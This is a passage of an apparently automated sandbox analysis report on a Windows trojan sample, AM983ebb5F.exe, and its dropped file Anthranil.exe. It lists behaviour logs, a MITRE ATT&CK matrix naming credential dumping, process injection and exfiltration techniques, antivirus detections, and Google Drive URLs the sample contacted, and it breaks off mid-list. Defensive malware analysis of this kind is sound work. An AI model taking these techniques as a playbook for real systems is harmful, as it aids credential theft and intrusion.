    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping21
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Shared Modules    		Boot or Logon Initialization Scripts411
    Process Injection    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol1
    Clipboard Data    		3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell    		Logon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture14
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials114
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    AM983ebb5F.exe50%ReversingLabsWin32.Trojan.Leonem
    AM983ebb5F.exe69%VirustotalBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\Anthranil.exe50%ReversingLabsWin32.Trojan.Leonem
    C:\Users\user\AppData\Local\Temp\Anthranil.exe69%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll0%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    drive.google.com
    		216.58.206.46
    		truefalse
      		high
      drive.usercontent.google.com
      		142.250.185.129
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://drive.usercontent.google.com/jAnthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2581207488.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://drive.google.com/:)Anthranil.exe, 00000006.00000003.2672365958.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2661358131.0000000005EE0000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684305199.0000000005EDA000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://translate.google.com/translate_a/element.jsAnthranil.exe, 00000006.00000003.2615565193.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626750886.0000000005E82000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626750886.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672365958.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2753950907.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2581207488.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603570858.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2777342764.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615437730.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603901435.0000000005E82000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2615565193.0000000005E82000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592769349.0000000005E82000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005E95000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2661273624.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005E95000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/wAnthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2777342764.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2753950907.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/tAnthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2765624883.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2742139208.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2661273624.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.ftp.ftp://ftp.gopher.Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                    		high
                    https://drive.usercontent.google.com/Anthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005E72000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/ds-cn.comAnthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorAM983ebb5F.exe, Anthranil.exe.1.drfalse
                          		high
                          https://drive.google.com/ice.Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.usercontent.google.com/omAnthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2981683074.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2914441562.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2903050718.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2958843876.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.3004468843.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.comAnthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/lifornia1Anthranil.exe, 00000006.00000003.2615437730.0000000005EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/KAnthranil.exe, 00000006.00000003.2936308090.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2799683039.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2810739376.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2822415683.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603833108.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2845242537.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2672435142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2731145065.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2718935201.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2924930142.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2649753153.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2891797419.0000000005EA4000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2947348025.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 